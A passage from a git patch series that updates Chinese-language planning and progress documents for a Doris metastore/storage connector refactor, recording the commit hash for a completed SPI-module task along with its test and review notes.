`equalsIgnoreCase` 的不对称保留)。**REST token-provider 改 case-SENSITIVE `"dlf".equals`**(对抗 review MAJOR:paimon 手抄 `equalsIgnoreCase` 是 latent bug,legacy ParamRules 才权威)。**FS `supports()` 改 `type==null||equalsIgnoreCase`**(去 trim 不对称 + 对齐 legacy reject-on-malformed)。**验证**:spi **41/0**(HMS 13·DLF 7·dispatch 7·ParseUtils 4·JDBC 4·REST 4·FS 2)、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import、`git diff` 白名单干净;**3 mutation 证**(HMS 大小写敏感 + kerberos-after-storage clobber + REST 大小写敏感 均 RED→GREEN)。**对抗 review `wf_2ddae04d-cf9`(4 lens + verify)**:0 BLOCKER/0 真 MAJOR(REST case-sens 已修);DV-006/007/D-006/D-4 经独立核实正确;trim/accessPublic-proxyMode divergence 经核证「对齐权威 legacy contract、仅偏离非权威 paimon 手抄」→不改;补 12 测覆盖缺口(storage re-key/clobber-via-storage-channel/alias-first-wins/username-overlay/DLF-S3-reject/dispatch-instanceof 等)。**API 旁改 2 javadoc**(getDriverUrl「raw,consumer-resolves」+ needsStorage FS 准确性,均诚实订正,白名单内)。⚠️ **docker e2e 未跑**(T2 真闸留 P2-T05)。 +- **P2-T03 必接(review 揪出,记此)**:①**F2 hive.conf.resources**:SPI `toHiveConfOverrides()` 只产 overrides,不含外部 hive-site.xml base;P2-T03 cutover 时连接器须 `ctx.loadHiveConfResources(raw.get("hive.conf.resources"))` 当 base 先施、再叠 overrides,否则外部 hive-site.xml 静默丢。②**HMS doAs 消费契约**:FE doAs 决策须看 `kerberos()` 非 `getAuthType()`(HDFS-fallback 时 getAuthType=SIMPLE 但 kerberos().isPresent)。③driver 注册/DriverShim(JVM 副作用)留 P2-T03(仅 resolveDriverUrl 已上移)。 +- **认领(2026-06-18,本 session)**:recon workflow `wf_187e052d-230`(4 reader + synth)+ 直接核实真实代码完成;3 边界经 AskUserQuestion 定(见下)。TDD:FILESYSTEM→REST→JDBC→DLF→HMS,单一 `[P2-T02]` commit。 +- **用户 3 决策(2026-06-18 AskUserQuestion)**:①**kerberos = compile-dep only**(fe-kerberos 零新代码,现有 `AuthType`+`KerberosAuthSpec` facts 足够,doAs 留 FE 侧)→ **DV-006**;②**parser storage 入参 = 中立 `Map storageHadoopConfig`**(非 `List`,spi **不**依赖 fe-filesystem-api,保持 hadoop/fs-free)→ **DV-007**;③**全 5 后端一次 commit、增量构建**。 +- **做什么**:新模块(依赖 metastore-api + **fe-foundation** + **fe-extension-spi**[for `PluginFactory`] + fe-kerberos;**无** fe-filesystem-api[DV-007]、无 thrift、无 hadoop):`Hms/Dlf/Rest/Jdbc/FileSystem` 5 个 `*MetaStorePropertiesImpl`(`@ConnectorProperty` 绑定,消灭 `PaimonConnectorProperties` 手抄别名数组)+ `MetaStoreParseUtils`(firstNonBlank/applyStorageConfig/matchedProperties)+ `JdbcDriverSupport.resolveDriverUrl`(**仅纯 resolver;driver 注册/DriverShim 是 JVM 副作用、无调用方 → 留 P2-T03**,Rule 2 不搬死代码);**+ `MetaStoreProvider

    ` SPI(`supports(Map)` 自识别 + abstract `bind(props, storageHadoopConfig)`)+ 5 内置 provider + 单 `META-INF/services` 文件(5 行)+ `MetaStoreProviders.bind(...)` first-hit 派发**(D-006,镜像 `FileSystemProvider`/`FileSystemPluginManager`)。来源 = 上移 paimon 现有 `PaimonCatalogFactory` 手抄逻辑(去 fe-core 化:HiveConf→中立 `Map`、authenticator→`KerberosAuthSpec` facts)。**fe-core 旧类不动**。**P2-T02 只建模块+测;paimon adapter 仍用手抄逻辑直到 P2-T03。** +- **HMS 补回 legacy parity gap(D-4)**:paimon 手抄 `validate()` 只查 uri,漏 legacy `HMSBaseProperties.buildRules` 的 forbidIf-simple/requireIf-kerberos 两条 → SPI parser **补回**(T2 parity target = legacy `Paimon*MetaStoreProperties`,非 paimon 手抄)。 +- **验收**:T2 等价性测试通过(解析产物 == 旧 `Paimon*MetaStoreProperties`:HiveConf key 集 + ParamRules 报错文案);`@ConnectorProperty` 别名/sensitive 生效;`MetaStoreProviders.bind` 经 `supports()` 正确选中 5 后端(**无 per-backend 枚举/中心 switch**)。⚠️ docker 真闸留 P2-T05。 +- **依赖**:P2-T01。设计 §4 P2-2 / §3.2 / §5 T2 / **D-006 / DV-006 / DV-007**。 ### P2-T03 ⬜ paimon adapter 改造 - **做什么**:`PaimonCatalogFactory` 的 `buildHmsHiveConf`/`buildDlfHiveConf`/`validate`/别名常量 → 调共享 `*MetastoreBackend.parse` + 薄 paimon Options/HiveConf 组装;删 `PaimonConnectorProperties` 别名数组。 From b3c18b96d99ecb4adad908e77392e38acd0819e3 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 18 Jun 2026 07:40:49 +0800 Subject: [PATCH 093/128] =?UTF-8?q?docs(storage-refactor):=20P2-T02=20?= =?UTF-8?q?=E2=80=94=20record=20commit=20ref=207ea63528bc4?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/metastore-storage-refactor/HANDOFF.md | 2 +- plan-doc/metastore-storage-refactor/PROGRESS.md | 4 ++-- plan-doc/metastore-storage-refactor/tasks.md | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index 08748f41a0f48d..29590dd3860ba6 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -11,7 +11,7 @@ **更新人**:Claude(Opus 4.8) > **本 session P2 进度补注(最新在最前)**: -> - **P2-T02 ✅(commit 待提交)**:新建 `fe-connector-metastore-spi`(22 文件 = 15 main + 7 test)。**3 边界经 AskUserQuestion 定**:**DV-006**(fe-kerberos = compile-dep only,**零新代码**——recon 三重证伪 HANDOFF 旧写「增量补 authenticator 机制」:产出 `KerberosAuthSpec` 纯 String→值对象不需 hadoop,真 doAs 留 FE 侧 `ctx.executeAuthenticated`)、**DV-007**(parser storage 入参 = 中立 `Map storageHadoopConfig`,**非** `List`;spi **不**依赖 fe-filesystem-api,保持 hadoop/fs-free;parser 拥有 storage-overlay 以守 kerberos-after-storage 序)、全 5 后端一次 commit。**内容**:`MetaStoreProvider

    extends PluginFactory`(`supports`+abstract `bind(props,storageHadoopConfig)`)+ `MetaStoreProviders.bind` first-hit ServiceLoader 派发 + `MetaStoreParseUtils`(firstNonBlank/copyIfPresent/applyStorageConfig/matchedProperties + `CATALOG_TYPE_KEY=paimon.catalog.type`)+ `JdbcDriverSupport.resolveDriverUrl`(**仅纯 resolver**;driver 注册/DriverShim JVM 副作用无调用方 → 留 P2-T03,Rule 2)+ `AbstractMetaStoreProperties`(共享 raw/warehouse/matchedProperties)+ 5 `*MetaStorePropertiesImpl`(`@ConnectorProperty` 绑定,消灭 `PaimonConnectorProperties` 手抄别名)+ 5 provider(`sensitivePropertyKeys` 暴露 sensitive 键,镜像 `S3FileSystemProvider`)+ 单 `META-INF/services`(5 行)。pom = metastore-api + fe-extension-spi + fe-foundation + fe-kerberos + commons-lang3(copy-plugin-deps phase=none)。**来源 = 上移 paimon `PaimonCatalogFactory` 手抄逻辑去 fe-core 化**(HiveConf→中立 Map、authenticator→facts);**fe-core 旧 `Paimon*MetaStoreProperties` 不动**。**HMS D-4 补回** legacy `HMSBaseProperties.buildRules` 的 forbidIf-simple/requireIf-kerberos(paimon 手抄 validate 漏;**CASE-SENSITIVE `Objects.equals` 对齐 ParamRules**,与 `buildHmsHiveConf` 的 `equalsIgnoreCase` 不对称**保留**)。验证:spi **41/0**、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import、白名单干净、**3 mutation RED→GREEN**(HMS 大小写敏感·kerberos-after-storage clobber·REST 大小写敏感)。**对抗 review `wf_2ddae04d-cf9`(4 lens + verify)**:0 BLOCKER;真 MAJOR=**REST token-provider `equalsIgnoreCase`→`"dlf".equals`**(paimon 手抄 latent bug,legacy ParamRules 才权威)已修;FS `supports()` 改 `type==null||equalsIgnoreCase`(去 trim 不对称 + 对齐 legacy reject-on-malformed);trim/accessPublic-proxyMode divergence 经核证「对齐权威 legacy contract、仅偏离非权威 paimon 手抄」→不改;补 12 测(storage re-key/clobber-via-storage-channel/alias-first-wins/username-overlay/DLF-S3-reject/dispatch-instanceof…)。**API 旁改 2 javadoc**(`getDriverUrl`「raw,consumer-resolves」+ `needsStorage` FS 准确性,诚实订正,白名单内)。⚠️ **docker 未跑**(T2 真闸 P2-T05)。 +> - **P2-T02 ✅(commit `7ea63528bc4`)**:新建 `fe-connector-metastore-spi`(22 文件 = 15 main + 7 test)。**3 边界经 AskUserQuestion 定**:**DV-006**(fe-kerberos = compile-dep only,**零新代码**——recon 三重证伪 HANDOFF 旧写「增量补 authenticator 机制」:产出 `KerberosAuthSpec` 纯 String→值对象不需 hadoop,真 doAs 留 FE 侧 `ctx.executeAuthenticated`)、**DV-007**(parser storage 入参 = 中立 `Map storageHadoopConfig`,**非** `List`;spi **不**依赖 fe-filesystem-api,保持 hadoop/fs-free;parser 拥有 storage-overlay 以守 kerberos-after-storage 序)、全 5 后端一次 commit。**内容**:`MetaStoreProvider

    extends PluginFactory`(`supports`+abstract `bind(props,storageHadoopConfig)`)+ `MetaStoreProviders.bind` first-hit ServiceLoader 派发 + `MetaStoreParseUtils`(firstNonBlank/copyIfPresent/applyStorageConfig/matchedProperties + `CATALOG_TYPE_KEY=paimon.catalog.type`)+ `JdbcDriverSupport.resolveDriverUrl`(**仅纯 resolver**;driver 注册/DriverShim JVM 副作用无调用方 → 留 P2-T03,Rule 2)+ `AbstractMetaStoreProperties`(共享 raw/warehouse/matchedProperties)+ 5 `*MetaStorePropertiesImpl`(`@ConnectorProperty` 绑定,消灭 `PaimonConnectorProperties` 手抄别名)+ 5 provider(`sensitivePropertyKeys` 暴露 sensitive 键,镜像 `S3FileSystemProvider`)+ 单 `META-INF/services`(5 行)。pom = metastore-api + fe-extension-spi + fe-foundation + fe-kerberos + commons-lang3(copy-plugin-deps phase=none)。**来源 = 上移 paimon `PaimonCatalogFactory` 手抄逻辑去 fe-core 化**(HiveConf→中立 Map、authenticator→facts);**fe-core 旧 `Paimon*MetaStoreProperties` 不动**。**HMS D-4 补回** legacy `HMSBaseProperties.buildRules` 的 forbidIf-simple/requireIf-kerberos(paimon 手抄 validate 漏;**CASE-SENSITIVE `Objects.equals` 对齐 ParamRules**,与 `buildHmsHiveConf` 的 `equalsIgnoreCase` 不对称**保留**)。验证:spi **41/0**、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import、白名单干净、**3 mutation RED→GREEN**(HMS 大小写敏感·kerberos-after-storage clobber·REST 大小写敏感)。**对抗 review `wf_2ddae04d-cf9`(4 lens + verify)**:0 BLOCKER;真 MAJOR=**REST token-provider `equalsIgnoreCase`→`"dlf".equals`**(paimon 手抄 latent bug,legacy ParamRules 才权威)已修;FS `supports()` 改 `type==null||equalsIgnoreCase`(去 trim 不对称 + 对齐 legacy reject-on-malformed);trim/accessPublic-proxyMode divergence 经核证「对齐权威 legacy contract、仅偏离非权威 paimon 手抄」→不改;补 12 测(storage re-key/clobber-via-storage-channel/alias-first-wins/username-overlay/DLF-S3-reject/dispatch-instanceof…)。**API 旁改 2 javadoc**(`getDriverUrl`「raw,consumer-resolves」+ `needsStorage` FS 准确性,诚实订正,白名单内)。⚠️ **docker 未跑**(T2 真闸 P2-T05)。 > - **决策补**:D-013(fe-kerberos 先建)|DV-006(kerberos compile-dep-only)|DV-007(storage 中立 Map,spi 不依赖 fe-filesystem-api)。 > - **P2-T01 ✅(commit `44d1fec4dcb`)**:新建 `fe-connector-metastore-api`(`org.apache.doris.connector.metastore`)= `MetaStoreProperties`(`providerName()`+能力方法 `needsStorage()`/`needsVendedCredentials()` 默认 false+`validate()` no-op+`rawProperties()`/`matchedProperties()`,**无 `MetaStoreType` 枚举** D-006)+ 5 子接口 HMS/DLF/REST/JDBC/FileSystem(中立 Map/标量;`HmsMetaStoreProperties` 用 fe-kerberos `AuthType`+`Optional`)。**依赖仅 fe-kerberos**(D-013;fe-foundation/fe-filesystem-api api 纯接口未用→留 spi)。pom 镜像 fe-connector-api(copy-plugin-deps none);注册 fe-connector/pom.xml。**未建 Glue/S3Tables**(留扩展)。`MetaStorePropertiesContractTest` 3/0、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import。 > - **P3a-T01 facts-carrier ✅(commit `51df4fccd01`,D-013)**:新顶层叶子 `fe-kerberos`(**零生产依赖**)facts 切片 `AuthType`(SIMPLE/KERBEROS, `fromString` 仅 "kerberos" 命中余皆 SIMPLE) + `KerberosAuthSpec`(client principal+keytab 不可变值对象, `hasCredentials()` 需两者非空;HMS service principal 不在此=HiveConf override)。6 测绿、checkstyle 0。**authenticator 机制子集(hadoop 依赖 + trino KerberosTicketUtils→JDK)= 待 P2-T02 增量补**。 diff --git a/plan-doc/metastore-storage-refactor/PROGRESS.md b/plan-doc/metastore-storage-refactor/PROGRESS.md index ac7c41cb3668a9..ce757b88d0f73c 100644 --- a/plan-doc/metastore-storage-refactor/PROGRESS.md +++ b/plan-doc/metastore-storage-refactor/PROGRESS.md @@ -29,7 +29,7 @@ - P0-T01 ✅|P0-T02 ✅(bindAll)|P1-T01 ✅(getStorageProperties 默认方法 + 边)|P1-T02 ✅(getStorageProperties 实现 + FileSystemFactory accessor)|P1-T03 ✅(paimon storage 配置 `applyStorageConfig` 改走 `toHadoopConfigurationMap()`)|P1-T04 ✅(paimon BE 静态凭据改走 `getStorageProperties().toBackendProperties().toMap()`,全量切)|**P1-T05 ✅**(删 paimon→fe-property pom 依赖边 + grep 归零闸)。 - ✅ **连接器 storage + BE 凭据路全切 fe-filesystem-api typed,且 paimon→fe-property 依赖边已断**:catalog 路 `PaimonConnector.buildStorageHadoopConfig()→toHadoopConfigurationMap()`;BE 扫描分片路 `PaimonScanPlanProvider` 遍历 `getStorageProperties()→toBackendProperties().toMap()`→`location.*`(vended overlays static 保序不动)。paimon 已零 `org.apache.doris.property/datasource` import + pom 无 fe-property 依赖(fe-property 变 0 消费者孤儿,本次不物理删 D-005)。 - ⚠️ **已知接受回归(fe-filesystem typed BE model 不全,超 P1 白名单)**:HDFS-warehouse paimon BE 配置丢(DV-004/R-007/FU-T01);无凭据 OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`(R-008/FU-T02)。均用户接受、follow-up 修、docker P1-T06 会暴露(非新 bug)。 -- **P2-T02 ✅(2026-06-18,commit 待提交)**:新建 `fe-connector-metastore-spi`(22 文件)= 5 后端 `*MetaStorePropertiesImpl`(`@ConnectorProperty` 绑定)+ `MetaStoreProvider` SPI/ServiceLoader first-hit 派发 + `MetaStoreParseUtils`/`JdbcDriverSupport`/`AbstractMetaStoreProperties`;**DV-006**(fe-kerberos 零新代码,facts-only)+ **DV-007**(storage = 中立 Map,模块 hadoop/fs-free)。spi 41/0、checkstyle 0、import-gate 0、3 mutation 证、对抗 review `wf_2ddae04d-cf9`(0 BLOCKER,REST case-sens MAJOR 已修,+12 测)。⚠️ docker 未跑。 +- **P2-T02 ✅(2026-06-18,commit `7ea63528bc4`)**:新建 `fe-connector-metastore-spi`(22 文件)= 5 后端 `*MetaStorePropertiesImpl`(`@ConnectorProperty` 绑定)+ `MetaStoreProvider` SPI/ServiceLoader first-hit 派发 + `MetaStoreParseUtils`/`JdbcDriverSupport`/`AbstractMetaStoreProperties`;**DV-006**(fe-kerberos 零新代码,facts-only)+ **DV-007**(storage = 中立 Map,模块 hadoop/fs-free)。spi 41/0、checkstyle 0、import-gate 0、3 mutation 证、对抗 review `wf_2ddae04d-cf9`(0 BLOCKER,REST case-sens MAJOR 已修,+12 测)。⚠️ docker 未跑。 - ▶ **下一步**:**P2-T03**(paimon `PaimonCatalogFactory` adapter 改走共享 `MetaStoreProviders.bind`,删手抄连接逻辑;**必接 review 揪出的 hive.conf.resources base + kerberos() doAs 消费契约 + driver 注册下移**,见 tasks P2-T02 块)。**P1-T06 推迟**(D-012,docker 折进 P2-T05)。 ## 阻塞 / 待决 @@ -40,7 +40,7 @@ --- ## 最近动态(最近 7 天) -- 2026-06-18 **P2-T02 ✅(新建 fe-connector-metastore-spi,commit 待提交)**:recon workflow `wf_187e052d-230`(4 reader+synth,证两 deviation)+ 直接核实 → 3 边界经 AskUserQuestion 定(**DV-006** fe-kerberos compile-dep-only 零新代码、**DV-007** storage 中立 Map 模块 hadoop/fs-free、全 5 后端一次 commit)。建 22 文件:`MetaStoreProvider` SPI + `MetaStoreProviders` first-hit ServiceLoader 派发 + `MetaStoreParseUtils` + `JdbcDriverSupport.resolveDriverUrl`(纯 resolver;注册留 P2-T03)+ `AbstractMetaStoreProperties` + 5 `*Impl`(`@ConnectorProperty`,消灭手抄别名)+ 5 provider(`sensitivePropertyKeys` 暴露 sensitive 键)+ 单 services 文件。来源=上移 paimon `PaimonCatalogFactory` 手抄逻辑去 fe-core 化(HiveConf→中立 Map、authenticator→`KerberosAuthSpec` facts)。**HMS D-4 补回** forbidIf-simple/requireIf-kerberos(CASE-SENSITIVE `Objects.equals` 对齐 ParamRules,保留与 conf-build `equalsIgnoreCase` 的不对称)。验证 spi **41/0**、checkstyle 0、import-gate 0、**3 mutation 证**(RED→GREEN)。**对抗 review `wf_2ddae04d-cf9`(4 lens+verify)**:0 BLOCKER;1 真 MAJOR=**REST token-provider `equalsIgnoreCase`→`"dlf".equals`**(paimon 手抄 latent bug,legacy ParamRules 权威)已修;FS `supports()` 去 trim 不对称 + 对齐 legacy;DV-006/007/D-006/D-4 独立核实正确;trim/accessPublic-proxyMode 经核证对齐权威 legacy contract(不改);补 12 测覆盖缺口。**API 旁改 2 javadoc**(诚实订正,白名单内)。**下一步 P2-T03**(必接 hive.conf.resources base + kerberos() doAs 契约 + driver 注册下移)。⚠️ docker 未跑(T2 真闸 P2-T05)。 +- 2026-06-18 **P2-T02 ✅(新建 fe-connector-metastore-spi,commit `7ea63528bc4`)**:recon workflow `wf_187e052d-230`(4 reader+synth,证两 deviation)+ 直接核实 → 3 边界经 AskUserQuestion 定(**DV-006** fe-kerberos compile-dep-only 零新代码、**DV-007** storage 中立 Map 模块 hadoop/fs-free、全 5 后端一次 commit)。建 22 文件:`MetaStoreProvider` SPI + `MetaStoreProviders` first-hit ServiceLoader 派发 + `MetaStoreParseUtils` + `JdbcDriverSupport.resolveDriverUrl`(纯 resolver;注册留 P2-T03)+ `AbstractMetaStoreProperties` + 5 `*Impl`(`@ConnectorProperty`,消灭手抄别名)+ 5 provider(`sensitivePropertyKeys` 暴露 sensitive 键)+ 单 services 文件。来源=上移 paimon `PaimonCatalogFactory` 手抄逻辑去 fe-core 化(HiveConf→中立 Map、authenticator→`KerberosAuthSpec` facts)。**HMS D-4 补回** forbidIf-simple/requireIf-kerberos(CASE-SENSITIVE `Objects.equals` 对齐 ParamRules,保留与 conf-build `equalsIgnoreCase` 的不对称)。验证 spi **41/0**、checkstyle 0、import-gate 0、**3 mutation 证**(RED→GREEN)。**对抗 review `wf_2ddae04d-cf9`(4 lens+verify)**:0 BLOCKER;1 真 MAJOR=**REST token-provider `equalsIgnoreCase`→`"dlf".equals`**(paimon 手抄 latent bug,legacy ParamRules 权威)已修;FS `supports()` 去 trim 不对称 + 对齐 legacy;DV-006/007/D-006/D-4 独立核实正确;trim/accessPublic-proxyMode 经核证对齐权威 legacy contract(不改);补 12 测覆盖缺口。**API 旁改 2 javadoc**(诚实订正,白名单内)。**下一步 P2-T03**(必接 hive.conf.resources base + kerberos() doAs 契约 + driver 注册下移)。⚠️ docker 未跑(T2 真闸 P2-T05)。 - 2026-06-18 **进入 P2(metastore SPI):P3a-T01 facts-carrier ✅ + P2-T01 ✅**(D-012 跳过/推迟 P1-T06 docker;D-013 用户选 fe-kerberos 先建)。**P3a-T01 facts 切片**(commit `51df4fccd01`)新建顶层叶子 `fe-kerberos`(零依赖)= `AuthType`(SIMPLE/KERBEROS, fromString 仅 "kerberos" 命中) + `KerberosAuthSpec`(principal/keytab 不可变值对象, hasCredentials 需两者);6 测绿、checkstyle 0。**P2-T01**(本次 commit)新建 `fe-connector-metastore-api`:`MetaStoreProperties`(providerName + needsStorage/needsVendedCredentials 默认 false + validate no-op + raw/matched,**无 MetaStoreType 枚举** D-006)+ HMS/DLF/REST/JDBC/FileSystem 5 子接口(中立 Map/标量;HMS 经 fe-kerberos `AuthType`/`Optional`);依赖仅 fe-kerberos(D-013;fe-foundation/fe-filesystem-api 留 spi 用时再加);契约测试 3/0、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import。未建 Glue/S3Tables(留扩展)。⚠️ docker 全程未跑(留 P2-T05)。**下一步 P2-T02**。 - 2026-06-18 **FU-T02 ✅ + FU-T03 ✅**(D-011,P1-T06 前补齐 fe-filesystem 对象存储;R-008 + R-006 闭环):**FU-T02**(commit `e5b088b14e7`)`Oss/Cos/ObsFileSystemProperties.toBackendKv()` 内联镜像 legacy `AbstractS3CompatibleProperties` 基类条件(ak/sk 皆空发 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`、否则省略);**DV-005** 不加字段/枚举(legacy OSS/COS/OBS 无可配置 provider type、`S3CredentialsProviderType` 在 s3 模块不可达,加字段反更不贴 legacy + 须扩白名单)——比原 D-011「加字段镜像 S3」更简更贴 legacy(用户本轮指令「处理逻辑一致」)。TDD RED→GREEN(3 ANONYMOUS 测 + 3 有凭据 assertNull 守省略)。**FU-T03** 4 个 `*PropertiesTest` 加调优默认守护(BE+Hadoop map,字面量期望值;S3 50/3000/1000、OSS/COS/OBS 100/10000/10000,已核 legacy `S3Properties.Env`/`OSS|COS|OBSProperties` parity);mutation 改 4 个 `DEFAULT_MAX_CONNECTIONS`→4 测全红证守护。验证:S3 15/0·OSS 14/0·COS 13/0·OBS 13/0 + 全 sibling suite 绿、checkstyle 0×4、`git diff` 白名单干净。⚠️ docker e2e 未跑(真闸 P1-T06)。**下一步 P1-T06**(R-006/7/8 全闭环 → 干净全绿验收)。 - 2026-06-17 **FU-T01 ✅**(D-010 授权,HDFS typed BE model 修 DV-004/R-007):新建 `fe-filesystem-hdfs` 的 `HdfsFileSystemProperties`(BE-only,忠实移植 legacy `initBackendConfigProperties`)+ `HdfsConfigFileLoader`(XML 资源)+ provider `bind()`/`create(P)`(`create(Map)`/`supports()` 不动)+ pom `fe-foundation`/`commons-lang3`。kerberos=**K1**(BE-key 字符串内联,不建 fe-kerberos,不碰 create()-side authenticator;用户 AskUserQuestion 选)。**真 parity 在 UT 落地**(非 paimon Option C):25 golden parity 钉 `toMap()`==legacy BE 键集(simple/kerberos/HA/username/uri-derive/XML/sysprop…)。验证 fe-filesystem-hdfs **78/0** + checkstyle 0 + RED/GREEN(mutation 关 kerberos 块→红) + fe-core `-am compile` 绿 + `git diff` 白名单干净。**对抗 review `wf_5db99e32-2ad`(27 agent,4 lens+verify)**:清场(packaging 无跨 loader、parity byte-level 复核、BE-only 无新 catalog 路回归、强 oss-hdfs 断言被 verify 推翻),3 实质修(①malformed-uri swallow→fail-loud 对齐 legacy;②2 处 stale 注释[bindAll javadoc/paimon KNOWN GAP 1];③+11 测试)。**F1**(XML config-dir 未接 `Config.hadoop_config_dir`)用户选「**现在接好**」=fe-core `FileSystemFactory` setProperty 桥(leaf 读 sysprop)。**额外触碰 3 已白名单文件**(FileSystemFactory/FileSystemPluginManager/PaimonScanPlanProvider,均 project-owned 微改/注释)。残留 oss-hdfs JindoFS 凭据=独立 FU。⚠️ docker e2e 未跑(HA/kerberized 真闸 P1-T06)。 diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md index bf4d7184f2c41a..77461004f42ca1 100644 --- a/plan-doc/metastore-storage-refactor/tasks.md +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -87,8 +87,8 @@ - **验收**:模块编译;接口签名对齐设计 §3.1(**确认无 `MetaStoreType` 枚举**);新模块声明进 `fe-connector/pom.xml`。 - **依赖**:~~无~~ **fe-kerberos(D-013,P3a-T01 facts-carrier 先建)**。设计 §4 P2-1 / §3.1 / **D-006 / D-013**。 -### P2-T02 ✅(2026-06-18 完成,commit 待提交)新建 fe-connector-metastore-spi(共享后端解析器 + Provider 发现) -- **完成态(2026-06-18,commit 待提交)**:新模块 `fe-connector-metastore-spi`(15 main + 7 test = 22 文件)= `MetaStoreProvider

    ` SPI(`supports(Map)` 自识别 + abstract `bind(props, storageHadoopConfig)`,extends `PluginFactory`)+ `MetaStoreProviders.bind` first-hit 派发(ServiceLoader)+ `MetaStoreParseUtils`(firstNonBlank/copyIfPresent/nullToEmpty/applyStorageConfig/matchedProperties + `CATALOG_TYPE_KEY`/`FS_S3A_PREFIX`/`USER_STORAGE_PREFIXES`)+ `JdbcDriverSupport.resolveDriverUrl`(仅纯 resolver)+ `AbstractMetaStoreProperties`(共享 raw/warehouse/matchedProperties)+ 5 `*MetaStorePropertiesImpl`(`@ConnectorProperty` 绑定,消灭手抄别名数组)+ 5 provider(各 `sensitivePropertyKeys` override 暴露 sensitive 键,镜像 FS)+ 单 `META-INF/services` 文件(5 行)。pom 依赖 = metastore-api + fe-extension-spi + fe-foundation + fe-kerberos + commons-lang3(**无** fe-filesystem-api[DV-007]、无 hadoop/hive/thrift);copy-plugin-deps phase=none;注册进 `fe-connector/pom.xml`。**HMS parity gap D-4 补回**(forbidIf-simple/requireIf-kerberos,CASE-SENSITIVE `Objects.equals` 对齐 ParamRules,与 conf-build branch `equalsIgnoreCase` 的不对称保留)。**REST token-provider 改 case-SENSITIVE `"dlf".equals`**(对抗 review MAJOR:paimon 手抄 `equalsIgnoreCase` 是 latent bug,legacy ParamRules 才权威)。**FS `supports()` 改 `type==null||equalsIgnoreCase`**(去 trim 不对称 + 对齐 legacy reject-on-malformed)。**验证**:spi **41/0**(HMS 13·DLF 7·dispatch 7·ParseUtils 4·JDBC 4·REST 4·FS 2)、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import、`git diff` 白名单干净;**3 mutation 证**(HMS 大小写敏感 + kerberos-after-storage clobber + REST 大小写敏感 均 RED→GREEN)。**对抗 review `wf_2ddae04d-cf9`(4 lens + verify)**:0 BLOCKER/0 真 MAJOR(REST case-sens 已修);DV-006/007/D-006/D-4 经独立核实正确;trim/accessPublic-proxyMode divergence 经核证「对齐权威 legacy contract、仅偏离非权威 paimon 手抄」→不改;补 12 测覆盖缺口(storage re-key/clobber-via-storage-channel/alias-first-wins/username-overlay/DLF-S3-reject/dispatch-instanceof 等)。**API 旁改 2 javadoc**(getDriverUrl「raw,consumer-resolves」+ needsStorage FS 准确性,均诚实订正,白名单内)。⚠️ **docker e2e 未跑**(T2 真闸留 P2-T05)。 +### P2-T02 ✅(2026-06-18 完成,commit `7ea63528bc4`)新建 fe-connector-metastore-spi(共享后端解析器 + Provider 发现) +- **完成态(2026-06-18,commit `7ea63528bc4`)**:新模块 `fe-connector-metastore-spi`(15 main + 7 test = 22 文件)= `MetaStoreProvider

    ` SPI(`supports(Map)` 自识别 + abstract `bind(props, storageHadoopConfig)`,extends `PluginFactory`)+ `MetaStoreProviders.bind` first-hit 派发(ServiceLoader)+ `MetaStoreParseUtils`(firstNonBlank/copyIfPresent/nullToEmpty/applyStorageConfig/matchedProperties + `CATALOG_TYPE_KEY`/`FS_S3A_PREFIX`/`USER_STORAGE_PREFIXES`)+ `JdbcDriverSupport.resolveDriverUrl`(仅纯 resolver)+ `AbstractMetaStoreProperties`(共享 raw/warehouse/matchedProperties)+ 5 `*MetaStorePropertiesImpl`(`@ConnectorProperty` 绑定,消灭手抄别名数组)+ 5 provider(各 `sensitivePropertyKeys` override 暴露 sensitive 键,镜像 FS)+ 单 `META-INF/services` 文件(5 行)。pom 依赖 = metastore-api + fe-extension-spi + fe-foundation + fe-kerberos + commons-lang3(**无** fe-filesystem-api[DV-007]、无 hadoop/hive/thrift);copy-plugin-deps phase=none;注册进 `fe-connector/pom.xml`。**HMS parity gap D-4 补回**(forbidIf-simple/requireIf-kerberos,CASE-SENSITIVE `Objects.equals` 对齐 ParamRules,与 conf-build branch `equalsIgnoreCase` 的不对称保留)。**REST token-provider 改 case-SENSITIVE `"dlf".equals`**(对抗 review MAJOR:paimon 手抄 `equalsIgnoreCase` 是 latent bug,legacy ParamRules 才权威)。**FS `supports()` 改 `type==null||equalsIgnoreCase`**(去 trim 不对称 + 对齐 legacy reject-on-malformed)。**验证**:spi **41/0**(HMS 13·DLF 7·dispatch 7·ParseUtils 4·JDBC 4·REST 4·FS 2)、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import、`git diff` 白名单干净;**3 mutation 证**(HMS 大小写敏感 + kerberos-after-storage clobber + REST 大小写敏感 均 RED→GREEN)。**对抗 review `wf_2ddae04d-cf9`(4 lens + verify)**:0 BLOCKER/0 真 MAJOR(REST case-sens 已修);DV-006/007/D-006/D-4 经独立核实正确;trim/accessPublic-proxyMode divergence 经核证「对齐权威 legacy contract、仅偏离非权威 paimon 手抄」→不改;补 12 测覆盖缺口(storage re-key/clobber-via-storage-channel/alias-first-wins/username-overlay/DLF-S3-reject/dispatch-instanceof 等)。**API 旁改 2 javadoc**(getDriverUrl「raw,consumer-resolves」+ needsStorage FS 准确性,均诚实订正,白名单内)。⚠️ **docker e2e 未跑**(T2 真闸留 P2-T05)。 - **P2-T03 必接(review 揪出,记此)**:①**F2 hive.conf.resources**:SPI `toHiveConfOverrides()` 只产 overrides,不含外部 hive-site.xml base;P2-T03 cutover 时连接器须 